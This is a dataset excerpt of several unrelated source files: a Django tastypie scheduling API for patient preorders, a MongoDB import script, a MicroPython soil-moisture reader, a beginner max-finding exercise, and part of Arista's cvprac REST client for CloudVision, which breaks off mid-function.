ALL_WITH_RELATIONS\nfrom tastypie import fields\nfrom tastypie.api import Api\nfrom apiutils.resources import ExtResource, ComplexQuery, ExtBatchResource\nfrom scheduler.models import RejectionCause, Calendar, Event, Preorder\nfrom patient.utils import smartFilter\nfrom django.db.models.query_utils import Q\n\n\nclass CalendarResource(ExtResource):\n\n class Meta:\n queryset = Calendar.objects.all()\n resource_name = 'calendar'\n authorization = DjangoAuthorization()\n filtering = {\n 'title': ALL,\n }\n list_allowed_methods = ['get', 'post', 'put']\n\n\nclass RejectionCauseResource(ExtResource):\n\n class Meta:\n queryset = RejectionCause.objects.all()\n resource_name = 'rejection_cause'\n authorization = DjangoAuthorization()\n filtering = {\n 'name': ALL,\n }\n list_allowed_methods = ['get', 'post', 'put']\n\n\nclass EventResource(ExtResource):\n staff = fields.ForeignKey('staff.api.PositionResource', 'staff', null=True)\n #preord = fields.ToOneField(PreorderResource, 'preord', null=True)\n\n def dehydrate(self, bundle):\n bundle.data['start'] = bundle.obj.start.strftime('%a %b %d %Y %H:%M:%S')\n bundle.data['end'] = bundle.obj.end.strftime('%a %b %d %Y %H:%M:%S ')\n #bundle.data['preord'] = bundle.obj.preord and bundle.obj.preord.id\n return bundle\n\n class Meta:\n queryset = Event.objects.all().select_related().order_by('start')\n resource_name = 'event'\n authorization = DjangoAuthorization()\n always_return_data = True\n filtering = {\n 'title': ALL,\n 'id': ALL,\n 'cid': ALL,\n 'start': ALL,\n 'end': ALL,\n 'timeslot': ALL,\n 'status': ALL,\n 'preord': ALL\n\n }\n limit = 1000\n list_allowed_methods = ['get', 'post', 'put']\n\n\nclass PreorderResource(ExtBatchResource):\n patient = fields.ForeignKey('patient.api.PatientResource', 'patient', null=True)\n timeslot = fields.OneToOneField(EventResource, 'timeslot', null=True)\n service = fields.ForeignKey('service.api.ExtendedServiceResource', 'service', null=True)\n promotion = fields.ForeignKey('promotion.api.PromotionResource', 'promotion', null=True)\n rejection_cause = fields.ForeignKey(RejectionCauseResource, 'rejection_cause', null=True)\n card = fields.ForeignKey('examination.api.CardResource', 'card', null=True)\n referral = fields.ForeignKey('visit.api.ReferralResource', 'referral', null=True)\n who_deleted = fields.ForeignKey('core.api.UserResource', 'who_deleted', null=True)\n\n def obj_create(self, bundle, request=None, **kwargs):\n kwargs['operator'] = request.user\n referral = request and request.active_profile.staff.referral\n if referral:\n kwargs['referral'] = referral\n result = super(PreorderResource, self).obj_create(bundle=bundle, request=request, **kwargs)\n return result\n\n def obj_update(self, bundle, request=None, **kwargs):\n if bundle.data['deleted']:\n bundle.data['who_deleted'] = request.user\n result = super(PreorderResource, self).obj_update(bundle=bundle, request=request, **kwargs)\n return result\n\n def build_filters(self, filters=None):\n if filters is None:\n filters = {}\n\n orm_filters = super(PreorderResource, self).build_filters(filters)\n\n if \"search\" in filters:\n smart_filters = smartFilter(filters['search'], 'patient')\n if len(smart_filters.keys()) == 1:\n try:\n orm_filters = ComplexQuery(Q(barcode__id=int(filters['search']))\\\n | Q(**smart_filters), **orm_filters)\n except:\n orm_filters.update(**smart_filters)\n else:\n orm_filters.update(**smart_filters)\n return orm_filters\n\n class Meta:\n queryset = Preorder.objects.filter(deleted=False)\n resource_name = 'preorder'\n authorization = DjangoAuthorization()\n always_return_data = True\n filtering = {\n 'patient': ALL_WITH_RELATIONS,\n 'timeslot': ALL,\n 'service': ALL_WITH_RELATIONS,\n 'payment_type': ALL,\n 'card': ALL_WITH_RELATIONS\n }\n list_allowed_methods = ['get', 'post', 'put']\n\n\nclass ExtPreorderResource(ExtResource):\n patient = fields.ForeignKey('patient.api.PatientResource', 'patient', null=True)\n timeslot = fields.OneToOneField(EventResource, 'timeslot', null=True)\n visit = fields.OneToOneField('visit.api.VisitResource', 'visit', null=True)\n service = fields.ForeignKey('service.api.ExtendedServiceResource', 'service', null=True)\n promotion = fields.ForeignKey('promotion.api.PromotionResource', 'promotion', null=True)\n card = fields.ForeignKey('examination.api.CardResource', 'card', null=True)\n referral = fields.ForeignKey('visit.api.ReferralResource', 'referral', null=True)\n who_deleted = fields.ForeignKey('core.api.UserResource', 'who_deleted', null=True)\n\n def obj_create(self, bundle, request=None, **kwargs):\n kwargs['operator'] = request.user\n referral = request and request.active_profile.staff.referral\n if referral:\n kwargs['referral'] = referral\n result = super(ExtPreorderResource, self).obj_create(bundle=bundle, request=request, **kwargs)\n return result\n\n def obj_update(self, bundle, request=None, **kwargs):\n# import pdb; pdb.set_trace()\n if bundle.data['deleted']:\n bundle.data['who_deleted'] = request.user\n result = super(ExtPreorderResource, self).obj_update(bundle=bundle, request=request, **kwargs)\n return result\n\n def build_filters(self, filters=None):\n if filters is None:\n filters = {}\n\n orm_filters = super(ExtPreorderResource, self).build_filters(filters)\n\n if \"search\" in filters:\n smart_filters = smartFilter(filters['search'], 'patient')\n if len(smart_filters.keys()) == 1:\n try:\n orm_filters = ComplexQuery(Q(barcode__id=int(filters['search']))\\\n | Q(**smart_filters), **orm_filters)\n except:\n orm_filters.update(**smart_filters)\n else:\n orm_filters.update(**smart_filters)\n return orm_filters\n\n def dehydrate(self, bundle):\n obj = bundle.obj\n bundle.data['service_name'] = obj.service and obj.service.base_service.name\n bundle.data['patient_name'] = obj.patient and obj.patient.full_name() or u'Пациент не указан'\n bundle.data['patient_birthday'] = obj.patient and obj.patient.birth_day\n bundle.data['ptype_name'] = obj.get_payment_type_display()\n bundle.data['execution_place'] = obj.service and obj.service.state_id\n bundle.data['execution_place_name'] = obj.service and obj.service.state.name\n bundle.data['promotion_name'] = obj.promotion and obj.promotion.name or ''\n bundle.data['promo_discount'] = obj.promotion and obj.promotion.discount and obj.promotion.discount_id or ''\n bundle.data['staff'] = obj.timeslot and obj.timeslot.cid\n bundle.data['staff_name'] = obj.timeslot and obj.timeslot.cid and obj.get_staff_name()\n bundle.data['price'] = obj.price or (obj.service and obj.service.get_actual_price(payment_type=obj.payment_type))\n bundle.data['start'] = obj.timeslot and obj.timeslot.start\n bundle.data['base_service'] = obj.service and obj.service.base_service_id\n bundle.data['patient_phone'] = obj.patient and obj.patient.mobile_phone\n bundle.data['operator_name'] = obj.operator or ''\n bundle.data['branches'] = obj.service and bundle.obj.service.branches.all().values_list('id', flat=True)\n bundle.data['referral_name'] = obj.referral and obj.referral.__unicode__()\n return bundle\n\n class Meta:\n queryset = Preorder.objects.filter(deleted=False).select_related().order_by('-timeslot__start')\n resource_name = 'extpreorder'\n authorization = DjangoAuthorization()\n always_return_data = True\n filtering = {\n 'deleted': ALL,\n 'patient': ALL,\n 'start': ALL,\n 'timeslot': ALL_WITH_RELATIONS,\n 'service': ALL_WITH_RELATIONS,\n 'visit': ALL_WITH_RELATIONS,\n 'card': ALL_WITH_RELATIONS,\n 'payment_type': ALL,\n 'id': ALL\n }\n limit = 500\n list_allowed_methods = ['get', 'post', 'put']\n\n\nclass VisitPreorderResource(ExtPreorderResource):\n \"\"\"\n Используется в форме визита при выборе предзаказа.\n Содержит неоформленные предзаказы начиная с сегодняшнего дня и направления\n \"\"\"\n\n def build_filters(self, filters=None):\n if filters is None:\n filters = {}\n\n orm_filters = super(VisitPreorderResource, self).build_filters(filters)\n\n if \"search\" in filters:\n smart_filters = smartFilter(filters['search'], 'patient')\n if len(smart_filters.keys()) == 1:\n try:\n orm_filters = ComplexQuery(Q(barcode__id=int(filters['search']))\\\n | Q(**smart_filters), **orm_filters)\n except:\n orm_filters.update(**smart_filters)\n else:\n orm_filters.update(**smart_filters)\n return orm_filters\n\n class Meta:\n queryset = Preorder.objects.filter(timeslot__isnull=True).order_by('-expiration')\n resource_name = 'visitpreorder'\n authorization = DjangoAuthorization()\n always_return_data = True\n filtering = {\n 'deleted': ALL,\n 'patient': ALL,\n 'start': ALL,\n 'expiration': ALL,\n 'timeslot': ALL_WITH_RELATIONS,\n 'service': ALL_WITH_RELATIONS,\n 'visit': ALL_WITH_RELATIONS,\n 'card': ALL_WITH_RELATIONS,\n 'payment_type': ALL\n }\n limit = 500\n list_allowed_methods = ['get', 'post', 'put']\n\n\napi = Api(api_name='scheduler')\n\napi.register(RejectionCauseResource())\napi.register(CalendarResource())\napi.register(PreorderResource())\napi.register(ExtPreorderResource())\napi.register(EventResource())\napi.register(VisitPreorderResource())\n","sub_path":"apps/scheduler/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":10706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"585926421","text":"# 64. MongoDBの構築\n# アーティスト情報(artist.json.gz)をデータベースに登録せよ.\n# さらに,次のフィールドでインデックスを作成せよ:\n# name, aliases.name, tags.value, rating.value\n\nfrom pymongo import MongoClient, ASCENDING\nimport gzip\nimport json\n\n\ndef init():\n client = MongoClient(\"localhost\", 27017)\n db = client.nlp100_knock\n col = db.artists\n\n i = 0\n pipeline = []\n for line in gzip.open(\"../data/artist.json.gz\", \"rt\", encoding=\"utf-8\"):\n artist = json.loads(line)\n pipeline.append(artist)\n i += 1\n if i % 100000 == 0 and pipeline:\n col.insert_many(pipeline)\n pipeline = []\n\n if pipeline != []:\n col.insert_many(pipeline)\n print(f\"stored {i} items\")\n\n for index in [\"name\", \"aliases.name\", \"tags.value\", \"rating.value\"]:\n col.create_index([(index, ASCENDING)])\n\n\nif __name__ == \"__main__\":\n init()\n","sub_path":"takahashi/chapter07/knock64.py","file_name":"knock64.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"646645834","text":"from machine import ADC, Pin\n\n\nled = Pin(2, Pin.OUT)\nvPin = ADC(Pin(34))\nvPin.atten(ADC.ATTN_11DB)\n# 11DB attenuation allows for a maximum input voltage\n# of approximately 3.6v (default is 0-1.0v)\n\n# RE: https://www.vegetronix.com/Curves/VH400-RevA/VG400-RevA-Curves.phtml\ncurve_data = {\n 0: 0,\n .6: 5,\n 1.1: 10,\n 1.3: 15,\n 1.4: 20,\n 1.5: 25,\n 1.6: 30,\n 1.7: 35,\n 1.8: 40,\n 2.0: 45,\n 2.2: 50,\n 3.3: 50\n}\n\n# Volumetric Water Content is a piecewise function\n# of the voltage from the sensor\n# this function returns the closest vwc value (below)\n# the current sensor reading\n\n\ndef get_vwc(sensor_voltage):\n sensor_voltage = float(sensor_voltage)\n if not sensor_voltage:\n return 0\n return curve_data[max(key for key in map(float, curve_data.keys()) if key <= sensor_voltage)]\n\n\ndef readSoilMoisture():\n led.value(1)\n sensor_value = vPin.read()\n sensor_voltage = sensor_value / 1000 # convert digital value to decimal\n soil_vwc = get_vwc(sensor_voltage)\n #moisture_percentage = 100.00 * (sensor_voltage / 3.3)\n\n print('sensor_value: ', sensor_value)\n print('sensor_voltage: ', sensor_voltage)\n print('soil_vwc: ', soil_vwc)\n\n led.value(0)\n return sensor_value, sensor_voltage, soil_vwc\n","sub_path":"src/moisture.py","file_name":"moisture.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"249058395","text":"n = input(\"Enter count of numbers: \")\nn = int(n)\n\ncount = 1\nnumbers = []\n\nwhile count <= n:\n number = input(\"Enter number: \")\n number = int(number)\n numbers = numbers + [number]\n count += 1\n \ni = 0\nmax_number = numbers[0]\n\nfor number in numbers:\n if max_number < number:\n max_number = number\n\nprint(\"Max is: \" + str(max_number))\n \n","sub_path":"week2/List-Problems/max_of_n.py","file_name":"max_of_n.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"265664354","text":"#\n# Copyright (c) 2017, Arista Networks, Inc.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n#\n# Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# Neither the name of Arista Networks nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# 'AS IS' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL ARISTA NETWORKS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN\n# IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n''' Class containing calls to CVP RESTful API.\n'''\nimport urllib\nfrom cvprac.cvp_client_errors import CvpApiError\n\n\nclass CvpApi(object):\n ''' CvpApi class contains calls to CVP RESTful API. The RESTful API\n parameters are passed in as parameters to the method. The results of\n the RESTful API call are converted from json to a dict and returned.\n Where needed minimal processing is performed on the results.\n Any method that does a cvprac get or post call could raise the\n following errors:\n\n ConnectionError: A ConnectionError is raised if there was a network\n problem (e.g. DNS failure, refused connection, etc)\n CvpApiError: A CvpApiError is raised if there was a JSON error.\n CvpRequestError: A CvpRequestError is raised if the request is not\n properly constructed.\n CvpSessionLogOutError: A CvpSessionLogOutError is raised if\n reponse from server indicates session was logged out.\n HTTPError: A HTTPError is raised if there was an invalid HTTP response.\n ReadTimeout: A ReadTimeout is raised if there was a request\n timeout when reading from the connection.\n Timeout: A Timeout is raised if there was a request timeout.\n TooManyRedirects: A TooManyRedirects is raised if the request exceeds\n the configured number of maximum redirections\n ValueError: A ValueError is raised when there is no valid\n CVP session. This occurs because the previous get or post request\n failed and no session could be established to a CVP node. Destroy\n the class and re-instantiate.\n '''\n # pylint: disable=too-many-public-methods\n # pylint: disable=too-many-lines\n\n def __init__(self, clnt, request_timeout=30):\n ''' Initialize the class.\n\n Args:\n clnt (obj): A CvpClient object\n '''\n self.clnt = clnt\n self.log = clnt.log\n self.request_timeout = request_timeout\n\n def get_cvp_info(self):\n ''' Returns information about CVP.\n\n Returns:\n cvp_info (dict): CVP Information\n '''\n return self.clnt.get('/cvpInfo/getCvpInfo.do',\n timeout=self.request_timeout)\n\n def get_task_by_id(self, task_id):\n ''' Returns the current CVP Task status for the task with the specified\n TaskId.\n\n Args:\n task_id (int): CVP task identifier\n\n Returns:\n task (dict): The CVP task for the associated Id. Returns None\n if the task_id was invalid.\n '''\n self.log.debug('get_task_by_id: task_id: %s' % task_id)\n try:\n task = self.clnt.get('/task/getTaskById.do?taskId=%s' % task_id,\n timeout=self.request_timeout)\n except CvpApiError as error:\n self.log.debug('Caught error: %s attempting to get task.' % error)\n # Catch an invalid task_id error and return None\n return None\n return task\n\n def get_tasks_by_status(self, status, start=0, end=0):\n ''' Returns a list of tasks with the given status.\n\n Args:\n status (str): Task status\n start (int): Start index for the pagination. Default is 0.\n end (int): End index for the pagination. If end index is 0\n then all the records will be returned. Default is 0.\n\n Returns:\n tasks (list): The list of tasks\n '''\n self.log.debug('get_tasks_by_status: status: %s' % status)\n data = self.clnt.get(\n '/task/getTasks.do?queryparam=%s&startIndex=%d&endIndex=%d' %\n (status, start, end), timeout=self.request_timeout)\n return data['data']\n\n def get_tasks(self, start=0, end=0):\n ''' Returns a list of all the tasks.\n\n Args:\n start (int): Start index for the pagination. Default is 0.\n end (int): End index for the pagination. If end index is 0\n then all the records will be returned. Default is 0.\n\n Returns:\n tasks (dict): The 'total' key contains the number of tasks,\n the 'data' key contains a list of the tasks.\n '''\n self.log.debug('get_tasks:')\n return self.clnt.get('/task/getTasks.do?queryparam=&startIndex=%d&'\n 'endIndex=%d' % (start, end),\n timeout=self.request_timeout)\n\n def get_logs_by_id(self, task_id, start=0, end=0):\n ''' Returns the log entries for the task with the specified TaskId.\n\n Args:\n task_id (int): CVP task identifier\n start (int): The first log entry to return. Default is 0.\n end (int): The last log entry to return. Default is 0 which\n means to return all log entries. Can be a large number to\n indicate the last log entry.\n\n Returns:\n task (dict): The CVP log for the associated Id. Returns None\n if the task_id was invalid.\n '''\n self.log.debug('get_log_by_id: task_id: %s' % task_id)\n return self.clnt.get('/task/getLogsById.do?id=%s&queryparam='\n '&startIndex=%d&endIndex=%d' %\n (task_id, start, end),\n timeout=self.request_timeout)\n\n def add_note_to_task(self, task_id, note):\n ''' Add notes to the task.\n\n Args:\n task_id (str): Task ID\n note (str): Note to add to the task\n '''\n self.log.debug('add_note_to_task: task_id: %s note: %s' %\n (task_id, note))\n data = {'workOrderId': task_id, 'note': note}\n self.clnt.post('/task/addNoteToTask.do', data=data,\n timeout=self.request_timeout)\n\n def execute_task(self, task_id):\n ''' Execute the task. Note that if the task has failed then inspect\n the task logs to determine why the task failed. If you see:\n\n Failure response received from the netElement: Unauthorized User\n\n then it means that the netelement does not have the same user ID\n and/or password as the CVP user executing the task.\n\n Args:\n task_id (str): Task ID\n '''\n self.log.debug('execute_task: task_id: %s' % task_id)\n data = {'data': [task_id]}\n self.clnt.post('/task/executeTask.do', data=data,\n timeout=self.request_timeout)\n\n def cancel_task(self, task_id):\n ''' Cancel the task\n\n Args:\n task_id (str): Task ID\n '''\n self.log.debug('cancel_task: task_id: %s' % task_id)\n data = {'data': [task_id]}\n self.clnt.post('/task/cancelTask.do', data=data,\n timeout=self.request_timeout)\n\n def get_configlet_by_name(self, name):\n ''' Returns the configlet with the specified name\n\n Args:\n name (str): Name of the configlet. Can contain spaces.\n\n Returns:\n configlet (dict): The configlet dict.\n '''\n self.log.debug('get_configlets_by_name: name: %s' % name)\n return self.clnt.get('/configlet/getConfigletByName.do?name=%s'\n % urllib.quote_plus(name),\n timeout=self.request_timeout)\n\n def get_configlet_history(self, key, start=0, end=0):\n ''' Returns the configlet history.\n\n Args:\n key (str): Key for the configlet.\n start (int): The first configlet entry to return. Default is 0\n end (int): The last configlet entry to return. Default is 0\n which means to return all configlet entries. Can be a\n large number to indicate the last configlet entry.\n\n Returns:\n history (dict): The configlet dict with the changes from\n most recent to oldest.\n '''\n self.log.debug('get_configlets_history: key: %s' % key)\n return self.clnt.get('/configlet/getConfigletHistory.do?configletId='\n '%s&queryparam=&startIndex=%d&endIndex=%d' %\n (key, start, end), timeout=self.request_timeout)\n\n def get_inventory(self, start=0, end=0, query=''):\n ''' Returns the a dict of the net elements known to CVP.\n\n Args:\n start (int): The first inventory entry to return. Default is 0\n end (int): The last inventory entry to return. Default is 0\n which means to return all inventory entries. Can be a\n large number to indicate the last inventory entry.\n query (string): A value that can be used as a match to filter\n returned inventory list. For example get all switches that\n are running a specific version of EOS.\n '''\n self.log.debug('get_inventory: called')\n data = self.clnt.get('/inventory/getInventory.do?'\n 'queryparam=%s&startIndex=%d&endIndex=%d' %\n (urllib.quote_plus(query), start, end),\n timeout=self.request_timeout)\n return data['netElementList']\n\n def add_device_to_inventory(self, device_ip, parent_name, parent_key):\n ''' Add the device to the specified parent container.\n\n Args:\n device_ip (str): ip address of device we are adding\n parent_name (str): Parent container name\n parent_key (str): Parent container key\n '''\n self.log.debug('add_device_to_inventory: called')\n data = {'data': [\n {\n 'containerName' : parent_name,\n 'containerId' : parent_key,\n 'containerType' : 'Existing',\n 'ipAddress' : device_ip,\n 'containerList' : []\n }]}\n self.clnt.post('/inventory/add/addToInventory.do?'\n 'startIndex=0&endIndex=0', data=data,\n timeout=self.request_timeout)\n\n def retry_add_to_inventory(self, device_mac, device_ip, username,\n password):\n '''Retry addition of device to Cvp inventory\n\n Args:\n device_mac (str): MAC address of device\n device_ip (str): ip address assigned to device\n username (str): username for device login\n password (str): password for user\n '''\n self.log.debug('retry_add_to_inventory: called')\n data = {\"key\" : device_mac,\n \"ipAddress\" : device_ip,\n \"userName\" : username,\n \"password\" : password}\n self.clnt.post('/inventory/add/retryAddDeviceToInventory.do?'\n 'startIndex=0&endIndex=0',\n data=data,\n timeout=self.request_timeout)\n\n def delete_device(self, device_mac):\n '''Delete the device and its pending tasks from Cvp inventory\n\n Args:\n device_mac (str): mac address of device we are deleting\n Returns:\n data (dict): Contains success or failure message\n '''\n self.log.debug('delete_device: called')\n return self.delete_devices([device_mac])\n\n def delete_devices(self, device_macs):\n '''Delete the device and its pending tasks from Cvp inventory\n\n Args:\n device_macs (list): list of mac address for\n devices we're deleting\n Returns:\n data (dict): Contains success or failure message\n '''\n self.log.debug('delete_devices: called')\n data = {'data': device_macs}\n return self.clnt.post('/inventory/deleteDevices.do?', data=data,\n timeout=self.request_timeout)\n\n def get_non_connected_device_count(self):\n '''Returns number of devices not accessible/connected in the temporary\n inventory.\n\n Returns:\n data (int): Number of temporary inventory devices not\n accessible/connected\n '''\n self.log.debug('get_non_connected_device_count: called')\n data = self.clnt.get('/inventory/add/getNonConnectedDeviceCount.do',\n timeout=self.request_timeout)\n return data['data']\n\n def save_inventory(self):\n '''Saves Cvp inventory state\n '''\n self.log.debug('save_inventory: called')\n return self.clnt.post('/inventory/add/saveInventory.do',\n timeout=self.request_timeout)\n\n def get_devices_in_container(self, name):\n ''' Returns a dict of the devices under the named container.\n\n Args:\n name (str): The name of the container to get devices from\n '''\n self.log.debug('get_devices_in_container: called')\n devices = []\n container = self.get_container_by_name(name)\n if container:\n data = self.clnt.get('/inventory/getInventory.do?'\n 'queryparam=%s&startIndex=0&'\n 'endIndex=0' % urllib.quote_plus(name),\n timeout=self.request_timeout)\n for device in data['netElementList']:\n if device['parentContainerId'] == container['key']:\n devices.append(device)\n return devices\n\n def get_device_by_name(self, fqdn):\n ''' Returns the net element device dict for the devices fqdn name.\n\n Args:\n fqdn (str): Fully qualified domain name of the device.\n\n Returns:\n device (dict): The net element device dict for the device if\n otherwise returns an empty hash.\n '''\n self.log.debug('get_device_by_name: fqdn: %s' % fqdn)\n data = self.get_inventory(start=0, end=0, query=fqdn)\n if len(data) > 0:\n for netelement in data:\n if netelement['fqdn'] == fqdn:\n device = netelement\n break\n else:\n device = {}\n else:\n device = {}\n return device\n\n def get_containers(self, start=0, end=0):\n ''' Returns a list of all the containers.\n\n Args:\n start (int): Start index for the pagination. Default is 0.\n end (int): End index for the pagination. If end index is 0\n then all the records will be returned. Default is 0.\n\n Returns:\n containers (dict): The 'total' key contains the number of\n containers, the 'data' key contains a list of the containers\n with associated info.\n '''\n self.log.debug('Get list of containers')\n return self.clnt.get('/inventory/add/searchContainers.do?'\n 'startIndex=%d&endIndex=%d' % (start, end))\n\n def get_container_by_name(self, name):\n ''' Returns a container that exactly matches the name.\n\n Args:\n name (str): String to search for in container names.\n\n Returns:\n container (dict): Container info in dictionary format or None\n '''\n self.log.debug('Get info for container %s' % name)\n conts = self.clnt.get('/provisioning/searchTopology.do?queryParam=%s'\n '&startIndex=0&endIndex=0'\n % urllib.quote_plus(name))\n if conts['total'] > 0 and conts['containerList']:\n for cont in conts['containerList']:\n if cont['name'] == name:\n return cont\n return None\n\n def get_configlets_by_device_id(self, mac, start=0, end=0):\n ''' Returns the list of configlets applied to a device.\n\n Args:\n mac (str): Device mac address (i.e. device id)\n start (int): The first configlet entry to return. Default is 0\n end (int): The last configlet entry to return. Default is 0\n which means to return all configlet entries. Can be a\n large number to indicate the last configlet entry.\n\n Returns:\n configlets (list): The list of configlets applied to the device\n '''\n self.log.debug('get_configlets_by_device: mac: %s' % mac)\n data = self.clnt.get('/provisioning/getConfigletsByNetElementId.do?'\n 'netElementId=%s&queryParam=&startIndex=%d&'\n 'endIndex=%d' % (mac, start, end),\n timeout=self.request_timeout)\n return data['configletList']\n\n def add_configlet(self, name, config):\n ''' Add a configlet and return the key for the configlet.\n\n Args:\n name (str): Configlet name\n config (str): Switch config statements\n\n Returns:\n key (str): The key for the configlet\n '''\n self.log.debug('add_configlet: name: %s config: %s' % (name, config))\n body = {'name': name, 'config': config}\n # Create the configlet\n self.clnt.post('/configlet/addConfiglet.do', data=body,\n timeout=self.request_timeout)\n\n # Get the key for the configlet\n data = self.clnt.get('/configlet/getConfigletByName.do?name=%s'\n % urllib.quote_plus(name),\n timeout=self.request_timeout)\n return data['key']\n\n def delete_configlet(self, name, key):\n ''' Delete the configlet.\n\n Args:\n name (str): Configlet name\n key (str): Configlet key\n '''\n self.log.debug('delete_configlet: name: %s key: %s' % (name, key))\n body = [{'name': name, 'key': key}]\n # Delete the configlet\n self.clnt.post('/configlet/deleteConfiglet.do', data=body,\n timeout=self.request_timeout)\n\n def update_configlet(self, config, key, name):\n ''' Update a configlet.\n\n Args:\n config (str): Switch config statements\n key (str): Configlet key\n name (str): Configlet name\n\n Returns:\n data (dict): Contains success or failure message\n '''\n self.log.debug('update_configlet: config: %s key: %s name: %s' %\n (config, key, name))\n\n # Update the configlet\n body = {'config': config, 'key': key, 'name': name}\n return self.clnt.post('/configlet/updateConfiglet.do', data=body,\n timeout=self.request_timeout)\n\n def validate_config(self, device_mac, config):\n ''' Validate a config against a device\n\n Args:\n device_mac (str): Device MAC address\n config (str): Switch config statements\n\n Returns:\n response (dict): A dict that contains the result of the\n validation operation\n '''\n self.log.debug('validate_config: name: %s config: %s'\n % (device_mac, config))\n body = {'netElementId': device_mac, 'config': config}\n # Invoke the validate API call\n result = self.clnt.post('/configlet/validateConfig.do', data=body,\n timeout=self.request_timeout)\n validated = True\n if 'warningCount' in result and result['warnings']:\n for warning in result['warnings']:\n self.log.warning('Validation of config produced warning - %s'\n % warning)\n if 'errorCount' in result:\n self.log.error('Validation of config produced %s errors'\n % result['errorCount'])\n if 'errors' in result:\n for error in result['errors']:\n self.log.error('Validation of config produced error - %s'\n % error)\n validated = False\n if 'result' in result:\n for item in result['result']:\n if 'messages' in item:\n for message in item['messages']:\n self.log.info('Validation of config returned'\n ' message - %s' % message)\n return validated\n\n def _add_temp_action(self, data):\n ''' Adds temp action that requires a saveTopology call to take effect.\n\n Args:\n data (dict): a data dict with a specific format for the\n desired action.\n\n Base Ex: data = {'data': [{specific key/value pairs}]}\n '''\n url = ('/provisioning/addTempAction.do?'\n 'format=topology&queryParam=&nodeId=root')\n self.clnt.post(url, data=data, timeout=self.request_timeout)\n\n def _save_topology_v2(self, data):\n ''' Confirms a previously created temp action.\n\n Args:\n data (list): a list that contains a dict with a specific\n format for the desired action. Our primary use case is for\n confirming existing temp actions so we most often send an\n empty list to confirm an existing temp action.\n\n Returns:\n response (dict): A dict that contains a status and a list of\n task ids created (if any).\n\n Ex: {u'data': {u'status': u'success', u'taskIds': []}}\n '''\n url = '/provisioning/v2/saveTopology.do'\n return self.clnt.post(url, data=data, timeout=self.request_timeout)\n\n def apply_configlets_to_device(self, app_name, dev, new_configlets,\n create_task=True):\n ''' Apply the configlets to the device.\n\n Args:\n app_name (str): The application name to use in info field.\n dev (dict): The switch device dict\n new_configlets (list): List of configlet name and key pairs\n create_task (bool): Determines whether or not to execute a save\n and create the tasks (if any)\n\n Returns:\n response (dict): A dict that contains a status and a list of\n task ids created (if any).\n\n Ex: {u'data': {u'status': u'success', u'taskIds': [u'32']}}\n '''\n self.log.debug('apply_configlets_to_device: dev: %s names: %s' %\n (dev, new_configlets))\n # Get all the configlets assigned to the device.\n configlets = self.get_configlets_by_device_id(dev['systemMacAddress'])\n\n # Get a list of the names and keys of the configlets\n cnames = []\n ckeys = []\n for configlet in configlets:\n cnames.append(configlet['name'])\n ckeys.append(configlet['key'])\n\n # Add the new configlets to the end of the arrays\n for entry in new_configlets:\n cnames.append(entry['name'])\n ckeys.append(entry['key'])\n\n info = '%s: Configlet Assign: to Device %s' % (app_name, dev['fqdn'])\n info_preview = 'Configlet Assign: to Device' + dev['fqdn']\n data = {'data': [{'info': info,\n 'infoPreview': info_preview,\n 'note': '',\n 'action': 'associate',\n 'nodeType': 'configlet',\n 'nodeId': '',\n 'configletList': ckeys,\n 'configletNamesList': cnames,\n 'ignoreConfigletNamesList': [],\n 'ignoreConfigletList': [],\n 'configletBuilderList': [],\n 'configletBuilderNamesList': [],\n 'ignoreConfigletBuilderList': [],\n 'ignoreConfigletBuilderNamesList': [],\n 'toId': dev['systemMacAddress'],\n 'toIdType': 'netelement',\n 'fromId': '',\n 'nodeName': '',\n 'fromName': '',\n 'toName': dev['fqdn'],\n 'nodeIpAddress': dev['ipAddress'],\n 'nodeTargetIpAddress': dev['ipAddress'],\n 'childTasks': [],\n 'parentTask': ''}]}\n self.log.debug('apply_configlets_to_device: saveTopology data:\\n%s' %\n data['data'])\n self._add_temp_action(data)\n if create_task:\n return self._save_topology_v2([])\n\n # pylint: disable=too-many-locals\n def remove_configlets_from_device(self, app_name, dev, del_configlets,\n create_task=True):\n ''' Remove the configlets from the device.\n\n Args:\n app_name (str): The application name to use in info field.\n dev (dict): The switch device dict\n del_configlets (list): List of configlet name and key pairs\n create_task (bool): Determines whether or not to execute a save\n and create the tasks (if any)\n\n Returns:\n response (dict): A dict that contains a status and a list of\n task ids created (if any).\n\n Ex: {u'data': {u'status': u'success', u'taskIds': [u'35']}}\n '''\n self.log.debug('remove_configlets_from_device: dev: %s names: %s' %\n (dev, del_configlets))\n\n # Get all the configlets assigned to the device.\n configlets = self.get_configlets_by_device_id(dev['systemMacAddress'])\n\n # Get a list of the names and keys of the configlets. Do not add\n # configlets that are on the delete list.\n keep_names = 